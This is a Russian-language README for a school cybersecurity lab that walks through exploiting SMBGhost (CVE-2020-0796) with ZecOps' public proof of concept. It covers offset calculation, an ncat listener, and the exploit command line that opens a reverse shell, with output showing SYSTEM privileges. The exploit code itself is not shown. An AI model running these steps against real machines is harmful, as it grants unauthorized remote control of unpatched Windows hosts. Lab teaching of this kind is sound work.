Учебный proof-of-concept эксплойт для CVE-2020-0796 (SMBGhost), демонстрирующий RCE без аутентификации на Windows SMBv3. Включает пошаговую настройку лаборатории, расчёт смещений и выполнение reverse shell для контролируемого обучения кибербезопасности.
Этот проект демонстрирует эксплуатацию proof-of-concept (PoC) CVE-2020-0796, также известного как SMBGhost, — критической уязвимости RCE без предварительной аутентификации, затрагивающей Windows 10 и Windows Server с SMBv3. Разработано в рамках школьного проекта по кибербезопасности. Вся заслуга в написании эксплойт-кода принадлежит ZecOps. Я лишь использовал и адаптировал его в образовательных целях для демонстрации эксплуатации CVE-2020-0796 в контролируемой лабораторной среде.
Для воспроизведения демонстрации требуется следующая настройка:
SMBleedingGhost.py от ZecOpscalc_target_offsets.bat от ZecOpsЗапустите Командную строку на обеих виртуальных машинах — атакующей и целевой.
Выполните следующую команду на каждой машине:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.batCVE-2020-0796-RCE-POC-master.SMBleedingGhost.py и откройте с помощью Блокнота.SMBleedingGhost.py прокрутите вниз и найдите раздел, начинающийся с OFFSETS = {.Откройте новое окно командной строки и выполните:
ncat -lvp 4321
4321 для приёма reverse shell с целевой ВМ в случае успешной эксплуатации.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
Пример, использованный в этой демонстрации:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: IP целевой ВМ192.168.18.62: IP атакующей ВМ4321: порт, используемый в netcat-слушателеВ случае успеха в окне netcat появится:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Это подтверждает, что:
Вы можете проверить доступ, выполнив команду:
whoami
Это выведет:
whoami
nt authority\system
Это означает, что атакующая ВМ теперь имеет привилегии уровня системы на целевой ВМ.
Можно также выполнить:
ipconfig
Чтобы убедиться, что вы взаимодействуете с сетью целевой ВМ.

Примечание: Целевая ВМ может завершиться аварийно после эксплуатации. Если это произойдёт, вы можете перезапустить её. Сеанс атакующего после перезагрузки нужно будет установить заново.
Эта демонстрация основана на публично доступном proof-of-concept, разработанном ZecOps.
Вся заслуга в написании эксплойт-кода принадлежит ZecOps. Я лишь использовал и адаптировал его в образовательных целях для демонстрации эксплуатации CVE-2020-0796 в контролируемой лабораторной среде.
Этот репозиторий создан исключительно в образовательных целях.
Все инструменты, скрипты и методики, представленные в демонстрации, предназначены для понимания уязвимостей кибербезопасности в контролируемой лабораторной среде. Не пытайтесь использовать какие-либо из предоставленных материалов на системах или в сетях, которые вам не принадлежат или на которые у вас нет явного разрешения на тестирование.
Автор не несёт ответственности за любое неправомерное использование программного обеспечения.